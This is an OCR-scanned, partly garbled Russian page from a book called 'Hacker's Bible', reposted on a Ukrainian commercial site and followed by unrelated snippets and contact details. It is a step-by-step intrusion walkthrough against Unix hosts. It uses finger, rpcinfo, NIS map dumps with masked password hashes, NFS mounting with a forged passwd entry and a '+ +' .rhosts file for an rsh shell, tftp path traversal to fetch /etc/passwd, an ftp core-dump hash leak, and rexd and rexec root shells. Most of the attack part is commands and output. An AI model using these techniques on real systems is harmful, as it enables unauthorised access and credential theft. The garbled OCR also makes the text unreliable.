БИБЛИЯ ХАКЕРА

Учись администрировать Windows 2000!

Советы системному администратору

[Www. xxx. xxxx. su]

Login Name

Kuzmenko Vladimir Kizmenko kuzmenko Vladimir Kizmenko milichen Yuri Mulichenko

Sherbak Eugeny Scherbkov

TTY Idle When pO 4:57 Sun 08:25 pi 2:38 Sun 08:26 p4 4:59 Fri 19:41 p5 5:00 Sat 10:18

Office

ЗВ/Г410 1-35-13 221Д448 1-77-33

Devil# finger Yur@ccsix. xxxx. xxxx. ru [ccsix. xxxx. xxxx. ru]

Login: yur Name: Yuri A. Podgorodsky

Directory: /home/yur Shell: /bin/bash

On since Sat Apr 12 12:24 (MSK) on ttypO from jannet. xxxx. xxxx

When

Idle

2 10:32 5 10:20

17:37 17:32

25:55

Apr Apr

Apr 2 11:21 Apr 2 10:33 97:11

3 hours 35 minutes idle Mail forwarded to yur@jannet. xxxx. xxxx. ru No mail. No Plan.

Devil# rusers -1 unisun. xxxxx-xxx. net Login Name TTY

Host

Lavrov unisun. xxxxx-xxx:console

Sun unisun. xxxxx-xxx:ttypO

(mskws. desy. de)

Lavrov unisun. xxxxx-xxx:ttypl

(:0,0)

Lavrov unisun. xxxxx-xxx :ttyp2

O0.0)

Эти сервисы дают нам аккаунты, позволяют нам узнать кто в дан­ный момент работает в системе, их shell и домашний каталог, возможно имена доверенных хостов. Обратите внимание на графу Idle, если в ней стоит несколько часов, то скорее всего в данный момент никто не обратит на вас внимание.

2. rpcinfo

Program

Version

Netid

Address

Service

Owner

100000

2

Tcp

- 0

0

0

0

0.

111

Rpcbind

Unknown

100000

2

Udp

0

0

0

0

0.

111

Rpcbind

Unknown

100004

2

Udp

0

0

0

0

2.

150

Ypserv

Unknown

100004

2

Tcp

0

0

0

0

2.

151

Ypserv

Unknown

100004

1

Udp

0

0

0

0

2.

150

Ypserv

Unknown

100004

1

Tcp

0

0

0

0

2.

151

Ypserv

Unknown

100069

1

Udp

0

0

0

0

2.

152

Unknown

100069

1

Tcp

0

0

0

0

2.

5 1

-

Unknown

100007

2

Tcp

0

0

0

0

4

0

Ypbind

Unknown

100007

2

Udp

0

0

0

0

4

3

Ypbind

Unknown

100007

1

Tcp

0

0

0

0

4

0

Ypbind

Unknown

100007

1

Udp

0

0

0

0

4

3

Ypbind

Unknown

100028

1

Tcp

0

0

0

0

2

5 1

Ypupdated

Unknown

100028

1

Udp

0

0

0

0

2

158

Ypupdated

Unknown

100009

1

Udp

0

0

0

0

3

255

Yppasswdd

Unknown

Devil# rpcinfo

SUn10.XXX, XXX. su

100029

1

Udp

0

0

0

0 2

159

Keyserv

Unknown

100003

2

Udp

0

0

0

0 8

.1

Nfs

Unknown

100005

1

Udp

0

0

0

0 2

.223

Raountd

Unknown

100005

2

Udp

0

0

0

0 2

.223

Mountd

Unknown

100005

1

Tcp

0

0

0

0 2

.226

Mountd

Unknown

100005

2

Tcp

0

0

0

0 2

.226

Mountd

Unknown

100024

1

Udp

0

0

0

0 2

.226

Status

Unknown

100024

1

Tcp

0

0

0

0 2

.228

Status

Unknown

100021

1

Tcp

0

0

0

0 2

.229

Nlockmgr

Unknown

Rpcinfo дает информацию о запущенных RPC сервисах. Наиболее интересны из них mountd, nisd, ypserv и ypbind, statd, boot pa ram, pcnfsd, rexd. statd позволяет стереть удаленно любой файл, pcnfsd и mountd дают доступ к дискам машины, rexd — удаленное выполнение команд.

3. NIS (nisd, ypbind, ypserv)

Если эта машина является NIS сервером, то зная NIS имя домена вы можете получить любые N IS карты простым грс запросом. Обычно это имя совпадает с именем домена и можно попытаться его угадать:

Devil# ypx - dg sunlo. xxx. xxx. su Trying domain sun10,xxx. xxx. su Trying domain sunio Trying domain xxx. xxx. su sysdiag:*:0:1:0ld System

Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/

Sundiag/sundiag

Sybase:*:13:55:syb:/usr/nros/sybase:/bin/csh nobody:*:65534:65534::/: daemon:*:1:1::/:

Audit:*: 9:9::/etc/security/audit:/bin/csh uucp:*:4:8::/var/spool/uucppublic:

Sync:__ F324VMRDcL6: 1:1:: /:/bin/sync

Root:_Ye. Ibw. 8uQg: 0:3: Ope rator: /: /bin/csh news:*:6:6::/var/spool/news:/bin/csh sys:*:2:2::/:/bin/csh

Snm:_ 7ck. pfEh/2s:11:11:Network Manager:/usr/snm:/bin/csh

Rom:__ IriAsoksSeE:10:10:Victor Romanchik:/usr/rom:/bin/csh

Nms:*:12:55:Network Manager:/usr/nms:/bin/csh

Bin:*:3:3::/bin:

YP map transfer successful]..

Мы заменили первые два символа каждого пароля на «_____ » и изме­нили имена здесь и далее в тексте.

Если угадать NIS имя домена не удается, возможно получить его че­рез bootparam сервис или подсмотреть в директории /var/yp, если она до­ступна публично.

4. showmount

Devil# showmount - e thsunl, xxxx. xxxxx. su export list for thsun1.xxxx. xxxxx. su:

/pub /opt

/pgm/linux

/export /usr

/tftpboot

/cdrom/sol_2_3_hw894_sparc/s0

/home

/scratch/users

(everyone)

Thsun2,thsun3,tlx39

(everyone) (everyone) (everyone) (everyone) (everyone) (everyone) (everyone)

С помощью showmount мы узнали о разделах, предоставляемых этим хостом, о правах доступа к ним и возможно о доверенных хостах. Та­кие важные каталоги как export, home, usr доступны всем! Попробуем... devil# mount - F nfs thsunl. xxxx. xxxxx. su:/home /mnt devils cd /mnt devil» 1$ - al total 12524

Drwxr-xr-x

17

Root

Root

1024Jun 28 1996 .

Drwxr-xr-x

28

Root

Root

1024 Apr 12 16:29 ,.

Drwxr-xr-x

2

Root

Root

512 May 19 1995 TT_DB

Drwxr-xr-x

3

Root

798

512 Nov 25 1 994 cfi

Drwxr-xr-x

6

Root

100

512 Nov 25 1994 dug

Drwxr-xr-x

9

Root

Other

512 Feb 17 11:19 lcta

Drwxr-xr-x

3

Root

Other

512 Jun 19 1996 lhep

Drwxr-xr-x

6

Root

Other

512 Feb 14 11:16 lnp

Drwxr-xr-x

6

Root

Other

512 Feb 14 11:19 lnup

Drwxr-xr-x

4

Root

Other

512 Jan 15 1995 lnur

Devil» cd

Lnup

Devil# Is

-al

Total 12

Drwxr-xr-x

6

Root

Other

512 Feb 14 11:19 .

Drwxr-xr-x

17

Root

Root

1024 Jun 28 1 996 ..

Drwxr-xr-x

3

6000

600

512 Oct 30 1995 dolbilov

Drwxr-xr-x

9

6190

600

1024 Oct 7 1996 davgun

Drwxr-xr-x

4

6001

600

512 Oct 20 1995 gvf

Drwxr-xr-x

4

6003

600

512 Apr 4 10:31 yup

Devil» echo 'dolbilov:

:600:' »

/etc/groups

Devil» echo ' dolbilov: x: 6000:600:: /noway: /bin/csh' » /etc/passwd devil# su dolbilov

$ cd dolbilov $ Is - al total 30 drwxr-xr-x drwxr-xr-x -rw-r~r— - rw-r—Г-- - rw-r—r— - rw-r--г— - rw

Drwxr-xr-x $ echo '+ +' $ exit

Devil# rsh -1 dolbilov thsun1.xxxx. xxxxx. su /bin/csh - i

$

Dolbilov dolbilov 512 Apr 12 16:21 .

Root other 512 Feb 14 11:19 ..

Dolbilov dolbilov 2901 Apr 7 1993 ,,cshrc

Dolbilov dolbilov 1550 Apr 7 1993 ..login

Dolbilov dolbilov 2750 Apr 7 1993 ,, rootmenu

Dolbilov dolbilov 478 Apr 7 1993 .sunview

Dolbilov dolbilov 2196 Oct 30 1995 mbox

Dolbilov dolbilov 512 Nov 25 1994 timezone, rhosts

5.

Таким образом мы получили shell на удаленной машине. sendmail

Devil* telnet www. ххх. ru 25 Trying 193.124. xxx. xx.. Connected to Www. xxx. ru.

Escape character is '"]'.

220 Www. xxx. ru ESMTP Sendmail 8.8.5/8.8.5; Sat, 12 Apr 1997 15:55:36 +0400 vrfy serg

550 serg... User unknown vrfy alex

250 Alexei E. Katov <ALEX@WWW. XXX. RU

Так мы попытались угадать несколько системных аккаунтов и ко­нечно записали версию sendmail'a — программы, содержащей легендар­ное количество ошибок. Не будем заострять на них внимания. Новые вер­сии выходят регулярно, старые ошибки исправляются, появляются новые.

6. tftp

Tftp широко известная программа похожая на ftp, служит для про­стейшего трансфера файлов. Ошибки в ней известны и исправлены в большинстве ОС, но и нижеследующий пример можно встретить: devil# tfp Www. xxx. ru

Tftp> get Дшр/../../../../../../../../. ./etc/passwd /tmp/passwd

Tftp > quit devil#

7. ftp

Сервис ftp является не только удобным, но и опасным для вашей си­стемы. Опасность представляет не только возможность украсть доверен­ную информацию или занести свою при неправильной конфигурации де­мона. Опасность представляет возможное крушение демона командами пользователя.

Devil# ftp ххххххххххх. ххх, com Connected to ххххххххххх. ххх, com.

220 xxxxxxxxxxx FTP server (UNIX(r) System V Release 4.0) ready.

Name (xxxxxxxxxxx. xxx. com: root): ftp

331 Guest login ok, send ident as password.

Password:

230 Guest login ok, access restrictions apply.

Ftp> user root ■ ■

530 User root unknown.

Login failed.

Ftp> user root

530 User root unknown.

Login failed.

Ftp> user foobar

530 User foobar access denied.

Login failed.

Ftp> quote pasv

421 Service not available, remote server has closed connection ftp> о xxxxxxxxxxx. xxx. com Connected to xxxxxxxxxxx. xxx. com.

220 xxxxxxxxxxx FTP server (UNIX(r) System V Release 4.0) ready. Name (xxxxxxxxxxx. xxx. com: root): ftp

331 Guest login ok, send ident as password. Password:

230 Guest login ok, access restrictions apply. ftp> bin

200 Type set to I. ftp> get core

200 PORT command successful.

150 Binary data connection for core (194.xx. xxx, xxx, 51553) (281136 bytes).

226 Binary Transfer complete. local: core remote: core

281136 bytes received in 16 seconds (17 Kbytes/s) ftp> bye

221 Goodbye. devil#

/********** Fragment of core ************/ .... 994:.. S.:.

Srk:___ a2U/fw. FWhk:....::::.. S

Ha rat: __mQb7Pi j 8m rA:....::::.. S@ kchu:__/sPKnswJ8y2:9....::::. .S' yhew:__0/L6foNhPoA:9....:::: . .S. :h6qh9see7ry. M:9353:....:. pa. .S. WGZ/NEzsLjwe 2:9097::. . .. flo. .S. Xbra. Omg/PMc :9097:::.... dave.. S. OVnEOzICamE: 9097::::....

TOC o "1-3" h z on:2 ,.T. VqQ02B0U:909 7::::::.......... :

/****************************************/

Мы заменили первые два символа каждого пароля на «_____ ».

8. rexd

devil» su daemon

$ on - i faxnetxx, xxx. ru /bin/sh - i $ uname - a

Faxnetxx faxnetxx 3.2 2 І386 $ id

Uid=1(daemon) gid=1(other) $

9. Сканирование портов

Портмэппер сообщает только о грс сервисах. Об остальных запу­щенных сервисах можно узнать прямым сканированием портов. Приве­дем только наиболее важные порты:

X server

X сервер базируется на портах 6000 + номер дисплея. Если X сервер не использует дня аутентификации magic cookies или защита отключена командой xhost +, информация с его дисплеев может быть подсмотрена или украдена, нажатия клавиш записаны, программы запущены удален­но (xspy, xpush). Если хост поддерживает соединение к 6000 порту, то это может быть использовано для denial_of_service атак.

Rlogin и talkd

В большинстве систем эти сервисы имеют ошибки, связанные с пе­реполнением буфера, rlogin пытается получить от удаленной системы пе­ременную TERM, a talkd — узнать имя хоста, требующего соединение. Ес­ли эти демоны получают в ответ строку большой длинны, то происходит переполнение буфера. Это дает возможность выполнить удаленно коман­ды с привилегиями root.

Rsh и rexec

Rsh и rexec позволяют получить командную оболочку не оставляя за­писей в log-файлах. Кроме того, эти сервисы не отслеживают запрет на удаленный root логин (/etc/default/login).

Devil# rsh -1 smtp xxxx. xxx. ru /bin/csh - i Warning: no access to tty; thus no job control in this shell... # id

Uid=0(root) gid=0(root) devil# nc - v xxxx. xxx. ru 512 xxxx. xxx. ru [194.85.xxx. xxx] 512 (exec) open "@root~@rootpasswd~@/bin/csh - i~@

Warning: no access to tty; thus no job control in this, shell... # id

Uid=0(root) gid=1(other) 10. Доверенные хосты

Обычно, работая в пределах одной группы, пользователям разреша­ется без пароля входить на соседние компьютеры. Такие доверительные машины указываются в файлах. rhosts и hosts. equiv. Предположить, какие хосты являются доверенными, можно отслеживая откуда наиболее часто заходят пользователи, особенно администраторы, просматривая права на доступ к NFS разделам. Использование доверительных отношений созда­ет определенное удобство, но вместе с тем порождает опасность проник­новения в систему злоумышленников. Взломщик может исказить инфор­мацию в DNS или NIS сервере и выдавать себя за доверенный хост.

БИБЛИЯ ХАКЕРА

Эта заподлистая кнопка power — как отключить?

На клавиатуре есть кнопка - у меня под делетом сразу, power называется - соответственно значок "яблоко с прямым хвостиком"... Какого гондураса её не разместили где-нибудь в другом месте да подальше …

Безопасность

Так уж устроен мир, что любое техническое изобретение человече­ского разума, расширяющее наши возможности и создающее для нас до­полнительный комфорт, неизбежно содержит в себе и отрицательные стороны, которые могут представлять потенциальную …

Прямой (кривой номер), АОН, БП и переадресация Прямые и кривые номера

Номера сотовых телефонов могут быть прямыми и кривыми. Пря­мые — это обычные городские семизначные (в Москве) номера, кривые (или федеральные) — набирать через коды 901, 902, 903, 501 или другие, …

Как с нами связаться:

Украина:
г.Александрия
тел./факс +38 05235  77193 Бухгалтерия

+38 050 457 13 30 — Рашид - продажи новинок
e-mail: msd@msd.com.ua
Схема проезда к производственному офису:
Схема проезда к МСД

Партнеры МСД

Контакты для заказов оборудования:

Внимание! На этом сайте большинство материалов - техническая литература в помощь предпринимателю. Так же большинство производственного оборудования сегодня не актуально. Уточнить можно по почте: Эл. почта: msd@msd.com.ua

+38 050 512 1194 Александр
- телефон для консультаций и заказов спец.оборудования, дробилок, уловителей, дражираторов, гереторных насосов и инженерных решений.